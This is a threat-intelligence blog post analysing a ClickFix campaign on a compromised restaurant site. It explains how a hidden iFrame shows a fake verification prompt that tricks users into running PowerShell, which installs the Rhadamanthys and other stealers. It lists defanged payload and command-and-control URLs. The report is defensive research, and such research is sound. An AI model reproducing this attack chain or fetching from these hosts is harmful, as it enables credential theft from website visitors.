ClickFix Campaign Targets Restaurant Reservations

July 29, 2025 | 5 min read

Joshua Green and Thomas Elkins

BlueVoyant Threat Fusion Cell (TFC) researchers recently investigated a ClickFix attack with unique aspects. The attack began when a user for a UK-based organization navigated to a restaurant’s website for reservations, which they reportedly had used extensively in the past to conduct business meetings and corroborated in the logs.  

The site compromised by this specific ClickFix campaign was gaia-restaurants[.]com. Upon visiting the initial site, a visitor is presented with a video and music, then guided to select various locations for the restaurant, including London, Marbella, Monte-Carlo, Doha, and Dubai. As of the time of our investigation, the lone compromised page appeared to be the London site, which served the below ClickFix landing page.

Gaia restaurants homepage

What are ClickFix Attacks? 

Taking a step back, ClickFix is a social engineering tactic that uses a fake error or verification message to manipulate victims into copying and running a malicious script, according to the ESET

The tactic was first observed in early 2024, and has surged 517% in the past 6 months, according to ESET. 

How Did This Restaurant ClickFix Attack Work? 

Examining the URL gaia-restaurants[.]com/london/, BlueVoyant found it was compromised with a threat actor inserting a JavaScript script within script tags, which is an approach seen in similar campaigns. The script was disguised using a publicly available tool.

Gaia restaurants blog code

The attack contained a list of IP addresses. If a user’s IP address does not match any on the list, the JavaScript script creates an iFrame element, which is part of HTML, and dynamically loads content from the remote server at hxxps://cdncloud[.]icu/?ref=gaia-restaurants.com. Critically, the iFrame is embedded directly into the compromised gaia-restaurants[.]com/london/ page, ensuring the user’s address bar continues to display the legitimate gaia-restaurants[.]com domain. 

The iFrame content is pulled from cdncloud[.]icu, which was hosted by Cloudflare; however, because it is embedded within the gaia-restaurants.com page, the browser’s address bar still shows the legitimate domain. This is standard iFrame behavior and central to the attack’s deception. This technique creates the illusion that the prompt originates from the legitimate site, masking the malicious payload’s external origin. 

Gaia restaurants code 2

If the user passes all function checks, they are presented with the ClickFix prompt. Instead of just being told to click a box to verify you are human or select all images that contain motorcycles, for example, the user is asked to run a script. As seen in the image below, the user was promoted to open a Run dialog box (Win + R), then pasted (Ctrl + V), and executed an obfuscated PowerShell command.

Gaia restaurant verification
Powershell

Code analysis suggests the threat actors attempted to hide the server used to deliver payloads, and direct victims along various attack chain paths.  

Using a Man-in-the-Middle (MiTM) proxy, BlueVoyant was able to capture the request and the response from that server, which led to the download of a PowerShell script in our analyzed sample.  

Analysis of the PowerShell indicates the purpose of the script is to download a remote file named cptch.bin from the URL hxxp://94.154.35[.]115/user_profiles_photo/cptch.bin and save the file into the users AppData Local directory, within newly created subfolder scache. As noted below, the cptch.bin file is saved to a variable name $shellcodeUrl.  

The purpose of the rest of the script is to check if the file cptch.bin is present, then attempt to reflectively load and execute the shellcode using various WinAPI functions for process injection such as VirtualAlloc, VirtualProtect, CreateThread. These can be used to load malware. 

Flow details

Interestingly, while analyzing the PowerShell script hosted on the remote server, we also noted various lines containing commented code written in Cyrillic. The presence of the Cyrillic comments coupled with their formatting and simplicity suggests the operators behind these attacks are Russian-speaking and that AI was likely used to build the script. A few of the translated comments read as:  

  • # Parameters
  • # markerPath folder
  • # Check: if folder exists, the script exits.
  • # Download shellcode as byte array.
  • # Import WinAPI functions 

The TFC identified the primary function of cptch.bin as decrypting the Rhadamanthys Stealer’s loader component, allocating executable memory via the Windows API functions and subsequently transferring execution to the decrypted loader within the newly allocated memory region. 

The Rhadamanthys loader attempts to retrieve its stealer component from the URL hxxps://107.150.0[.]79/gate12837823way/5js75177.rvb2h. Upon successful download, the stealer is injected into a newly spawned process named wmpshare.exe. Once executed, the Rhadamanthys stealer initiates a connection back to the same IP address for command and control. 

As part of the analysis, several other payload URLs hosted on the same 94.154.35[.]115 server were also discovered. These URLs followed a similar format and were also observed in late June and early July. The payloads turned out to lead to other commodity stealer malware payloads: 

  • http[:]//94.154.35[.]115/user_profiles_photo/update.exe ß PureLogs Stealer
  • http[:]//94.154.35[.]115/user_profiles_photo/stlc.exe ß StealC Stealer
  • http[:]//94.154.35[.]115/user_profiles_photo/shinsc.bin ßShellcode binary
  • http[:]//94.154.35[.]115/user_profiles_photo/shellcode.bin ßShellcode binary
  • http[:]//94.154.35[.]115/user_profiles_photo/klzpshell.exe ß LummaC2 Stealer 

Analysis of the Indicators of Compromise (IOC) revealed a wide campaign targeting visitors from dozens of compromised websites across diverse industries and geographies, including finance, retail, technology, and even government. 

How BlueVoyant’s Research is Keeping Clients Safe 

BlueVoyant TFC continues to monitor ClickFix attacks to ensure any new tactics are surfaced and clients are defended. Due to the detections BlueVoyant has in place for in regards to the ClickFix campaigns, the BlueVoyant SOC was able to immediately respond to the initial ClickFix payload.

In the above case, BlueVoyant immediately responded to the initial ClickFix alert when it attempted to execute the first powershell. Quick action by BlueVoyant SOC analysts working together with the client confirmed the attack was blocked, the user’s account was reset and the infected device was cleaned.  

The operators behind this attack chain opted to host its PowerShell-based loader directly on a Cloudflare server, serving it up via iFrame contents to present on compromised sites. Further analysis of the PowerShell script suggests the code may have been generated using AI tools by Russian-speaking actors. This evidence confirms the oft-noted assessment that AI tools are being widely employed by adversaries as well. The evidence suggests this is a “traffer” operation centering on the goal of credential theft and information stealing, a significant threat that seems to be expanding exponentially with each passing day. If the “right” user goes to their favorite restaurant spot to reserve a table for a business meeting, then this story could have had a different, more nightmarish ending. 

How to Protect Yourself from ClickFix Attacks 

One of the biggest ways to prevent attacks like these is to be highly suspicious of unexpected prompts. If a website is asking you to run code instead of clicking a box, this is highly indicative of ClickFix, and you should not proceed further. 

Organizations should also educate employees on the risks of ClickFix attacks and test them. 

In addition, organizations should have a trusted cybersecurity partner to share threat intelligence and detection tactics to help prevent their employees from falling victim. 

Joshua Green is a principal security researcher, and Thomas Elkins is a tier 3 SOC analyst. 

Related Reading